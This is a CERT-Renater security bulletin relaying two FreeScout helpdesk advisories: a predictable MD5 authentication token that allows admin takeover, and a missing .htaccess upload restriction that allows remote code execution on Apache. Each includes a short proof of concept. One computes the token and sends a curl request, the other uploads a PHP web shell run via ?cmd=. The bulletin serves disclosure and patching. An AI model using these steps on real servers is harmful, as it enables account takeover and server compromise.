Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN229
_____________________________________________________________________

DATE                : 27/02/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running freescout (Composer) versions
                                   prior to 1.8.206.

=====================================================================
https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-6gcm-v8xf-j9v9
https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-mw88-x7j3-74vc
_____________________________________________________________________


Predictable Authentication Token Enables Account Takeover
Critical
freescout-help-desk published GHSA-6gcm-v8xf-j9v9 Feb 24, 2026

Package
freescout-helpdesk/freescout (Composer)

Affected versions
<= 1.8.205

Patched versions
1.8.206


Description

Summary

FreeScout's TokenAuth middleware uses a predictable authentication
token computed as MD5(user_id + created_at + APP_KEY). This token
is static (never expires/rotates), and if an attacker obtains the
APP_KEY — a well-documented and common exposure vector in Laravel
applications — they can compute a valid token for any user,
including the administrator, achieving full account takeover
without any password.

Severity: Critical (CVSS 9.8)


Details

Affected File: app/Http/Middleware/TokenAuth.php (Lines 24-28)

The middleware authenticates users when:

    The request contains an auth_token query parameter
    The in_app cookie is present (trivially set by attacker)

public function handle($request, Closure $next)
{
    if (!$request->user() && !empty($request->auth_token) && $request->cookie('in_app')) {
        $user = User::where(
            \DB::raw('md5(CONCAT(id, created_at, "'.config('app.key').'"))'),
            $request->auth_token
        )->first();
        if (!empty($user)) {
            \Auth::login($user);
        }
    }
    return $next($request);
}

Critical weaknesses:

    Static token: Never expires, never rotates. Valid forever
once computed.
    Deterministic: Derived from known/guessable values — user_id
(sequential, admin=1), created_at (timestamp), and APP_KEY.
    No rate limiting: Unlimited authentication attempts.
    Trivial cookie: The in_app cookie is set by the
attacker — zero security value.

Secondary: app/Attachment.php (Line 236) uses the same weak
pattern: md5(config('app.key').$this->id.$this->size)


PoC

Prerequisites: A running FreeScout instance + knowledge of
APP_KEY (obtainable via .env exposure, debug mode, backup leaks, git history, SSRF, etc.)

# Step 1: Compute token for admin (user_id=1)
APP_KEY="base64:YOUR_APP_KEY_HERE"
CREATED_AT="2026-01-15 10:30:00"  # admin account creation timestamp
TOKEN=$(echo -n "1${CREATED_AT}${APP_KEY}" | md5sum | cut -d' ' -f1)

# Step 2: Authenticate as admin
curl -b 'in_app=1' "https://target.com/conversations?auth_token=${TOKEN}"
# Result: Full admin access — manage mailboxes, read all
conversations, modify settings

In testing, token computation takes <1ms. The created_at timestamp
can be narrowed via user enumeration or brute-forced
(realistic window of days/weeks).


Impact

Full account takeover of any FreeScout user including administrators.
An attacker gains:

    Access to all helpdesk conversations and customer data
    Ability to modify system settings and create new admin accounts
    Potential for further server compromise through admin functionality

This affects all FreeScout installations where the APP_KEY may be
exposed through any common Laravel misconfiguration vector.


Severity
Critical
9.8/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-27637

Weaknesses
Weakness CWE-330

Credits

    @Offensive-AI Offensive-AI Reporter

_____________________________________________________________________


Missing .htaccess in Restricted File Extensions Allows Remote Code
Execution on Apache
High
freescout-help-desk published GHSA-mw88-x7j3-74vc Feb 24, 2026

Package
freescout-helpdesk/freescout (Composer)

Affected versions
<= 1.8.205

Patched versions
1.8.206


Description

Summary

FreeScout's file upload restriction list in app/Misc/Helper.php does
not include .htaccess or .user.ini files. On Apache servers with
AllowOverride All (a common configuration), an authenticated user
can upload a .htaccess file to redefine how files are processed,
enabling Remote Code Execution.


Severity: High (CVSS 8.8)
Details

Affected File: app/Misc/Helper.php (Lines 62-68)

The restricted extensions list:

public static $restricted_extensions = [
    'php', 'php3', 'php4', 'php5', 'pht',
    'exe', 'bat', 'cmd', 'com', 'vbs', 'vbe',
    'js', 'jse', 'wsf', 'wsh', 'msc',
];

Missing critical extensions:

    .htaccess — Apache configuration override
    .user.ini — PHP per-directory configuration
    .phtml, .phar — PHP executable extensions

PoC

Prerequisites: Authenticated user (any role) on a FreeScout instance
running on Apache with AllowOverride All.

# Step 1: Upload .htaccess via conversation reply attachment
# File content:
AddType application/x-httpd-php .txt

# Step 2: Upload a .txt file containing PHP code
<?php system($_GET['cmd']); ?>

# Step 3: Access the .txt file directly
curl "https://target.com/storage/app/attachment/1/shell.txt?cmd=id"
# Result: uid=33(www-data) gid=33(www-data)

Verified: Upload of .htaccess file returns {"status":"success"} with
no restriction.


Impact

Remote Code Execution on Apache-based FreeScout deployments. An
authenticated attacker (any user role, including agents) can:

    Execute arbitrary system commands on the server
    Read/write files on the filesystem
    Pivot to other services and internal networks
    Exfiltrate all data including database credentials

This is especially critical when combined with the TokenAuth bypass
(GHSA-6gcm-v8xf-j9v9), which allows unauthenticated attackers to
first gain admin access and then achieve RCE.


Severity
High
8.8/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-27636

Weaknesses
Weakness CWE-434

Credits

    @Offensive-AI Offensive-AI Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================